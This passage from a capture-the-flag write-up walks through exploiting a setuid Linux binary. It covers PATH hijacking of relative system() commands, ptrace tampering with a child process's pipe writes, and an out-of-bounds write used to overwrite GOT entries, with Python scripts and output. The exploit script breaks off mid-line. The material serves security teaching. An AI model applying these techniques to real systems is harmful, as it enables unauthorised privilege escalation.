style="color: #88C0D0;"> setresuid</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">getuid</span><span style="color: #ECEFF4;">(),</span><span style="color: #88C0D0;"> getuid</span><span style="color: #ECEFF4;">(),</span><span style="color: #88C0D0;"> getuid</span><span style="color: #ECEFF4;">())</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> setresgid</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">getgid</span><span style="color: #ECEFF4;">(),</span><span style="color: #88C0D0;"> getgid</span><span style="color: #ECEFF4;">(),</span><span style="color: #88C0D0;"> getgid</span><span style="color: #ECEFF4;">())</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> prctl</span><span style="color: #ECEFF4;">(</span><span>PR_SET_DUMPABLE</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> prctl</span><span style="color: #ECEFF4;">(</span><span>PR_SET_PTRACER</span><span style="color: #ECEFF4;">,</span><span> PR_SET_PTRACER_ANY</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> make_measurements</span><span style="color: #ECEFF4;">(</span><span>p</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> report_measurements</span><span style="color: #ECEFF4;">(</span><span>p</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> break;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> default</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> printf</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Command runtime verification tool v1.0</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> printf</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Please wait while command runtimes are being verified...</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> read_measurements</span><span style="color: #ECEFF4;">(</span><span>p</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print_measurements</span><span style="color: #ECEFF4;">()</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> break;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span></code></pre><h2 id="review-of-rtv-c">Review of rtv.c</h2> <p>Let's examine the main() function first. We see that a pipe is created [1], then a child process is created with fork [2]. In the child process, the SETUID privileges are dropped [3] and then the process is made debuggable with ptrace via the call to <code>prtcl(PR_SET_PTRACER)</code> [4]. Finally, we see that the parent and child process execute functions that have to do with "measurements" and each uses one side of the pipe [5]. We can assume that information will be passed between both processes.</p> <p><img src="/assets/naga1.png" alt="naga1" /></p> <p>The call to <code>prctl()</code> with PR_SET_PTRACER has a big impact here. Ptrace allows us to read and modify memory of the process, set breakpoints and modify register values (including EIP). The end result is that <strong>the code of the child is now irrelevant</strong>, we can replace it with whatever we want. This is something we will put to use later on.</p> <h2 id="systematic-failure">Systematic failure</h2> <p>We then inspect the functions that are called in the child process. The first one is <code>make_measurements()</code>. This function iterates over the entries defined in the Measurement table [1] (see Figure 3). This table contains <code>measurement_t</code> structures which contains commands. Those commands are executed via <code>system()</code> [2], the output is redirected to /dev/null. Finally the function the execution time of the commands in the runtime member of the structure in the Measurements table.</p> <p><img src="/assets/naga2.png" alt="naga2" /></p> <p><img src="/assets/naga3.png" alt="naga3" /></p> <p>As we can see, the commands that are called are defined with relative paths. This is classic vulnerability on UNIX systems. To exploit this, we simply need to modify the PATH environment variable to add a folder that we control at the beginning and create an executable file (a shell script works just fine) for one of the commands in it (for example env in this case). The result will be that our executable will be called instead of the intended one.</p> <p>However, in this case this is not sufficient to read the flag. As the calls to system() are made by the child process, the SETUID privileges have already been dropped by then. It does however allow us to easily retrieve the pid of the child process as it is put in the <code>PARENTPID</code> variable when the commands are called. This will be of great importance in the next part. (Note : on the original CTF server, /proc/ was disabled, probably to avoid snooping between competitors. The <code>PARENTPID</code> variable was thus needed).</p> <h2 id="let-s-talk">Let's talk</h2> <p>The last part of the program is where the child process returns the measurement data to the parent process which in turn prints it to the standard output via <code>print_measurements()</code>.</p> <p>We see that <code>report_measurements()</code> iterates over the Measurement table with a for loop and writes 1) <code>i</code>, the index in the table and 2) <code>runtime</code>, the execution time of the executed command.</p> <p><img src="/assets/naga4.png" alt="naga4" /></p> <p>The same thing is done in <code>read_measurements()</code> in the parent process, however it is done slightly differently. The function enters in a while loop and reads the data provided in the pipe, if the size of the reads don't correspond to the expected size the program stops execution there [1]. The runtime information is then written in the Measurements table of the parent process, the loop ends when i is equal to the last index of the table <code>(measurementCount - 1)</code>.</p> <p>Normally this would be fine if we expect the child to behave correctly. However, due to our ability to use ptrace on the child process and modify the data written in the pipe, we can cause a write outside of the Measurements table [2]. We will also control 8 bytes at every write, since we control i we can make as many writes as we want.</p> <p><img src="/assets/naga5.png" alt="naga5" /></p> <h2 id="arbitrary-write-not-quite">Arbitrary write? not quite</h2> <p>We now know that we can cause memory overwrites in the address space of the parent memory. But where exactly can we write? Figure 6 shows the assembly code from IDA corresponding to the <code>Measurements[i].runtime = t;</code> statement in <code>read_measurements()</code>. 0x0804100 is the address of the first runtime entry in the Measurements table. Then i is multiplied by 0x88 which is the size of the measurement_t structure (128 bytes for cmd + 8 bytes for runtime).</p> <p><img src="/assets/naga6.png" alt="naga6" /></p> <p>The multiplication is somewhat obscured as it optimized with shift-left instructions, each shift multiplies by 2.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>shl eax, 3; eax = i * 8</span></span> <span class="giallo-l"><span>mov ebx, eax; ebx = i * 8</span></span> <span class="giallo-l"><span>shl ebx, 4; ebx = i * 8 * 16 = i * 128</span></span> <span class="giallo-l"><span>add eax, ebx; eax = i * 8 + i * 128 = i * 136 (136 equals 0x88)</span></span></code></pre> <p>The write address can be determined with the following formula :</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span> writeAddr = 0x804A100 + i * 0x88</span></span></code></pre> <p>If you are lucky enough to have a license for it, Hexrays Decompiler actually provides the formula directly.</p> <p><img src="/assets/naga7.png" alt="naga7" /></p> <p>We now need to find one or may memory address(es) to overwrite to hijack the control flow of the program. The GOT (Global Offset Table) is usually a good candidate. It can be dumped with the command <code>objdump -R rtv</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>level2@montrehack:~$ objdump -R rtv</span></span> <span class="giallo-l"><span>rtv: file format elf32-i386</span></span> <span class="giallo-l"><span>DYNAMIC RELOCATION RECORDS</span></span> <span class="giallo-l"><span>OFFSET TYPE VALUE</span></span> <span class="giallo-l"><span>08049ffc R_386_GLOB_DAT __gmon_start__</span></span> <span class="giallo-l"><span>0804a32c R_386_COPY stderr</span></span> <span class="giallo-l"><span>0804a00c R_386_JUMP_SLOT setresuid</span></span> <span class="giallo-l"><span>0804a010 R_386_JUMP_SLOT read</span></span> <span class="giallo-l"><span>0804a014 R_386_JUMP_SLOT printf</span></span> <span class="giallo-l"><span>0804a018 R_386_JUMP_SLOT gettimeofday</span></span> <span class="giallo-l"><span>0804a01c R_386_JUMP_SLOT __stack_chk_fail</span></span> <span class="giallo-l"><span>0804a020 R_386_JUMP_SLOT getuid</span></span> <span class="giallo-l"><span>0804a024 R_386_JUMP_SLOT perror</span></span> <span class="giallo-l"><span>0804a028 R_386_JUMP_SLOT fwrite</span></span> <span class="giallo-l"><span>0804a02c R_386_JUMP_SLOT getpid</span></span> <span class="giallo-l"><span>0804a030 R_386_JUMP_SLOT puts</span></span> <span class="giallo-l"><span>0804a034 R_386_JUMP_SLOT system</span></span> <span class="giallo-l"><span>0804a038 R_386_JUMP_SLOT __gmon_start__</span></span> <span class="giallo-l"><span>0804a03c R_386_JUMP_SLOT exit</span></span> <span class="giallo-l"><span>0804a040 R_386_JUMP_SLOT __libc_start_main</span></span> <span class="giallo-l"><span>0804a044 R_386_JUMP_SLOT write</span></span> <span class="giallo-l"><span>0804a048 R_386_JUMP_SLOT getgid</span></span> <span class="giallo-l"><span>0804a04c R_386_JUMP_SLOT prctl</span></span> <span class="giallo-l"><span>0804a050 R_386_JUMP_SLOT pipe</span></span> <span class="giallo-l"><span>0804a054 R_386_JUMP_SLOT fork</span></span> <span class="giallo-l"><span>0804a058 R_386_JUMP_SLOT sprintf</span></span> <span class="giallo-l"><span>0804a05c R_386_JUMP_SLOT setresgid</span></span></code></pre> <p>Inspecting the code of the program reveals the functions read, printf and exit might be called after memory corruption, being able to overwrite the entry of one those should allow us to redirect execution.</p> <p>A naive approach would be to calculate the write addresses for each value of i. This can be done with the following script :</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #81A1C1;">import</span><span> sys</span></span> <span class="giallo-l"><span>BASE</span><span style="color: #81A1C1;"> = 0x</span><span style="color: #B48EAD;">0804A100</span></span> <span class="giallo-l"><span>addresses</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> [</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A010</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # read</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A014</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # printf</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A030</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # puts</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A03C</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # exit</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>i</span><span style="color: #81A1C1;"> =</span><span style="color: #B48EAD;"> 0</span></span> <span class="giallo-l"><span style="color: #81A1C1;">while</span><span style="color: #ECEFF4;"> (</span><span>i</span><span style="color: #81A1C1;"> &lt;= 0x</span><span style="color: #B48EAD;">FFFFFFFF</span><span style="color: #ECEFF4;">):</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> i</span><span style="color: #81A1C1;"> %</span><span style="color: #B48EAD;"> 100000</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;"> :</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Trying i = </span><span style="color: #EBCB8B;">{0}</span><span style="color: #A3BE8C;">...</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">hex</span><span style="color: #ECEFF4;">(</span><span>i</span><span style="color: #ECEFF4;">)))</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> writeAddr</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> (</span><span>BASE</span><span style="color: #81A1C1;"> +</span><span style="color: #ECEFF4;"> (</span><span>i</span><span style="color: #81A1C1;"> * 0x</span><span style="color: #B48EAD;">88</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;"> &amp; 0x</span><span style="color: #B48EAD;">FFFFFFFF</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span> addr</span><span style="color: #81A1C1;"> in</span><span> addresses</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> addr</span><span style="color: #81A1C1;"> ==</span><span> writeAddr</span><span style="color: #81A1C1;"> or</span><span style="color: #ECEFF4;"> (</span><span>addr</span><span style="color: #81A1C1;"> &gt;</span><span> writeAddr</span><span style="color: #81A1C1;"> and</span><span> addr</span><span style="color: #81A1C1;"> -</span><span> writeAddr</span><span style="color: #81A1C1;"> &lt;=</span><span style="color: #B48EAD;"> 8</span><span style="color: #ECEFF4;">):</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">FOUND : writeAddr </span><span style="color: #EBCB8B;">{0}</span><span style="color: #A3BE8C;"> i = </span><span style="color: #EBCB8B;">{1}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">hex</span><span style="color: #ECEFF4;">(</span><span>writeAddr</span><span style="color: #ECEFF4;">),</span><span> i</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span> sys</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">exit</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"><span> i</span><span style="color: #81A1C1;"> +=</span><span style="color: #B48EAD;"> 1</span></span></code></pre> <p>While this approach will find a result, it is very slow. A better approach is to take into account the fact that the value of <code>writeAddr</code> grows by 0x88 each time i is increased. We can bring back <code>writeAddr</code> around the area of the address we are targeting by increasing i so that it cycles over the 32 bit address space. To obtain this value, we divide 0xFFFFFFFF by 0x88 which gives us 31 580 641. Then it's just a matter of adjusting i upward or downward until we are between 0x88 bytes of our target address. We have now saved 31 580 640 useless computations, that's a nice optimization :-)</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span>addresses</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> [</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A010</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # read</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A014</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # printf</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A030</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # puts</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804A03C</span><span style="color: #ECEFF4;">,</span><span style="color: #616E88;"> # exit</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>BASE</span><span style="color: #81A1C1;"> = 0x</span><span style="color: #B48EAD;">0804A100</span></span> <span class="giallo-l"><span>TARGET</span><span style="color: #81A1C1;"> =</span><span> addresses</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>i</span><span style="color: #81A1C1;"> =</span><span style="color: #B48EAD;"> 0</span></span> <span class="giallo-l"><span>n</span><span style="color: #81A1C1;"> =</span><span style="color: #B48EAD;"> 0</span></span> <span class="giallo-l"><span style="color: #81A1C1;">while</span><span> i</span><span style="color: #81A1C1;"> &lt;= 0x</span><span style="color: #B48EAD;">FFFFFFFF</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> i</span><span style="color: #81A1C1;">=</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">31580641</span><span style="color: #81A1C1;">*</span><span>n</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span> writeaddr</span><span style="color: #81A1C1;"> =</span><span style="color: #B48EAD;"> 0</span></span> <span class="giallo-l"><span> diff</span><span style="color: #81A1C1;"> =</span><span style="color: #B48EAD;"> 0</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #81A1C1;"> while True</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> writeaddr</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> (</span><span>BASE</span><span style="color: #81A1C1;"> +</span><span style="color: #ECEFF4;"> (</span><span>i</span><span style="color: #81A1C1;"> * 0x</span><span style="color: #B48EAD;">88</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;"> &amp; 0x</span><span style="color: #B48EAD;">FFFFFFFF</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> writeaddr</span><span style="color: #81A1C1;"> &gt;=</span><span> TARGET</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> diff</span><span style="color: #81A1C1;"> =</span><span> writeaddr</span><span style="color: #81A1C1;"> -</span><span> TARGET</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> diff</span><span style="color: #81A1C1;"> &lt;= 0x</span><span style="color: #B48EAD;">88</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> break</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> else</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> i</span><span style="color: #81A1C1;"> -=</span><span style="color: #B48EAD;"> 1</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> else</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> diff</span><span style="color: #81A1C1;"> =</span><span> TARGET</span><span style="color: #81A1C1;"> -</span><span> writeaddr</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> diff</span><span style="color: #81A1C1;"> &lt;= 0x</span><span style="color: #B48EAD;">88</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> break</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> else</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> i</span><span style="color: #81A1C1;"> +=</span><span style="color: #B48EAD;"> 1</span></span> <span class="giallo-l"></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #A3BE8C;">i = </span><span style="color: #EBCB8B;">%08x</span><span style="color: #A3BE8C;"> writeaddr = </span><span style="color: #EBCB8B;">%08x</span><span style="color: #A3BE8C;"> diff = </span><span style="color: #EBCB8B;">%d</span><span style="color: #ECEFF4;">&quot;</span><span style="color: #81A1C1;"> %</span><span style="color: #ECEFF4;"> (</span><span>i</span><span style="color: #ECEFF4;">,</span><span> writeaddr</span><span style="color: #ECEFF4;">,</span><span> diff</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span> n</span><span style="color: #81A1C1;"> +=</span><span style="color: #B48EAD;"> 1</span></span></code></pre> <p>The script actually executes instantly, provided that our target address is near the base address 0x0804A100 which is the case for the GOT. Here is a part of the output for <code>read</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>ekse@montrehack:~/level2$ python map_address.py</span></span> <span class="giallo-l"><span>i = -0000001 writeaddr = 0804a078 diff = 104</span></span> <span class="giallo-l"><span>i = 01e1e1e1 writeaddr = 0804a088 diff = 120</span></span> <span class="giallo-l"><span>i = 03c3c3c2 writeaddr = 0804a010 diff = 0</span></span> <span class="giallo-l"><span>i = 05a5a5a3 writeaddr = 08049f98 diff = 120</span></span> <span class="giallo-l"><span>i = 07878785 writeaddr = 08049fa8 diff = 104</span></span> <span class="giallo-l"><span>i = 09696967 writeaddr = 08049fb8 diff = 88</span></span> <span class="giallo-l"><span>i = 0b4b4b49 writeaddr = 08049fc8 diff = 72</span></span> <span class="giallo-l"><span>i = 0d2d2d2b writeaddr = 08049fd8 diff = 56</span></span> <span class="giallo-l"><span>i = 0f0f0f0d writeaddr = 08049fe8 diff = 40</span></span> <span class="giallo-l"><span>i = 10f0f0ef writeaddr = 08049ff8 diff = 24</span></span> <span class="giallo-l"><span>i = 12d2d2d1 writeaddr = 0804a008 diff = 8</span></span> <span class="giallo-l"><span>i = 14b4b4b2 writeaddr = 08049f90 diff = 128</span></span> <span class="giallo-l"><span>i = 16969694 writeaddr = 08049fa0 diff = 112</span></span> <span class="giallo-l"><span>i = 18787876 writeaddr = 08049fb0 diff = 96</span></span> <span class="giallo-l"><span>i = 1a5a5a58 writeaddr = 08049fc0 diff = 80</span></span> <span class="giallo-l"><span>i = 1c3c3c3a writeaddr = 08049fd0 diff = 64</span></span> <span class="giallo-l"><span>i = 1e1e1e1c writeaddr = 08049fe0 diff = 48</span></span> <span class="giallo-l"><span>i = 1ffffffe writeaddr = 08049ff0 diff = 32</span></span> <span class="giallo-l"><span>i = 21e1e1e0 writeaddr = 0804a000 diff = 16</span></span> <span class="giallo-l"><span>i = 23c3c3c1 writeaddr = 08049f88 diff = 136</span></span> <span class="giallo-l"><span>i = 25a5a5a3 writeaddr = 08049f98 diff = 120</span></span> <span class="giallo-l"><span>i = 27878785 writeaddr = 08049fa8 diff = 104</span></span> <span class="giallo-l"><span>i = 29696967 writeaddr = 08049fb8 diff = 88</span></span> <span class="giallo-l"><span>i = 2b4b4b49 writeaddr = 08049fc8 diff = 72</span></span> <span class="giallo-l"><span>i = 2d2d2d2b writeaddr = 08049fd8 diff = 56</span></span> <span class="giallo-l"><span>i = 2f0f0f0d writeaddr = 08049fe8 diff = 40</span></span> <span class="giallo-l"><span>i = 30f0f0ef writeaddr = 08049ff8 diff = 24</span></span> <span class="giallo-l"><span>....</span></span></code></pre> <p>We can see that by using an i value of 03c3c3c2 we are able to overwrite <code>read</code> directly.</p> <h2 id="rtvtrace-py-ptrace-to-my-heart">rtvtrace.py - ptrace to my heart</h2> <p>I wrote a script using python-ptrace to modify the values of i and runtime that are sent in the pipe by the child process. To go faster, I actually used the Gdb implementation provided with the library which allows to easily create breakpoints and modify memory and registry values.</p> <p>The code is actually quite simple. It sets 2 breakpoints, one before the write of i in the pipe and the second before the write of runtime. In each case eax points to the data that will be written, we simply point it to another address with our own supplied data. Note that in this debugger, breakpoint are removed after being hit so they will be executed only for the first command. To test that it works, we overwrite the address of read in the GOT with 0x41424344.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #81A1C1;">import</span><span> sys</span></span> <span class="giallo-l"><span style="color: #81A1C1;">import</span><span> struct</span></span> <span class="giallo-l"><span style="color: #81A1C1;">from</span><span> gdb</span><span style="color: #81A1C1;"> import</span><span> Gdb</span></span> <span class="giallo-l"><span style="color: #81A1C1;">from</span><span> ptrace</span><span style="color: #ECEFF4;">.</span><span>debugger</span><span style="color: #81A1C1;"> import</span><span> PtraceDebugger</span><span style="color: #ECEFF4;">,</span><span> ProcessSignal</span><span style="color: #ECEFF4;">,</span><span> ProcessExit</span></span> <span class="giallo-l"><span>pid</span><span style="color: #81A1C1;"> =</span><span> sys</span><span style="color: #ECEFF4;">.</span><span>argv</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> Gdb</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #ECEFF4;">.</span><span>debugger</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> PtraceDebugger</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #81A1C1;"> = None</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">attachProcess</span><span style="color: #ECEFF4;">(</span><span>pid</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">[!] attached to </span><span style="color: #EBCB8B;">{0}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span>pid</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span style="color: #616E88;">#gdb.breakpoint(&quot;0x80487e0&quot;)</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">breakpoint</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">0x080487d6</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span>gdb</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">breakpoint</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">0x08048802</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #81A1C1;">while</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">True</span><span style="color: #ECEFF4;">):</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> try</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> gdb</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">cont</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"><span> eip</span><span style="color: #81A1C1;"> =</span><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">getreg</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">eip</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">EIP: </span><span style="color: #EBCB8B;">{0}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">hex</span><span style="color: #ECEFF4;">(</span><span>eip</span><span style="color: #ECEFF4;">)))</span></span> <span class="giallo-l"><span style="color: #616E88;"> #if eip == 0x80487e0:</span></span> <span class="giallo-l"><span style="color: #616E88;"> # print(&quot;pipe descriptor: {0}&quot;.format(hex(gdb.process.getreg(&quot;eax&quot;))))</span></span> <span class="giallo-l"><span style="color: #616E88;"> # WRITE WHERE</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> eip</span><span style="color: #81A1C1;"> == 0x</span><span style="color: #B48EAD;">80487d6</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> eax</span><span style="color: #81A1C1;"> =</span><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">getreg</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">eax</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span> i</span><span style="color: #81A1C1;"> =</span><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">readBytes</span><span style="color: #ECEFF4;">(</span><span>eax</span><span style="color: #ECEFF4;">,</span><span style="color: #B48EAD;"> 4</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Current id loc: </span><span style="color: #EBCB8B;">{0}</span><span style="color: #A3BE8C;"> value : </span><span style="color: #EBCB8B;">{1}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">hex</span><span style="color: #ECEFF4;">(</span><span>eax</span><span style="color: #ECEFF4;">),</span><span> struct</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">unpack</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">&lt;I</span><span style="color: #ECEFF4;">&quot;,</span><span>i</span><span style="color: #ECEFF4;">)))</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Changing data location for write of id...</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">writeBytes</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">0x</span><span style="color: #B48EAD;">0804a060</span><span style="color: #ECEFF4;">,</span><span> struct</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">pack</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">&lt;I</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;">63161282</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span> gdb</span><span style="color: 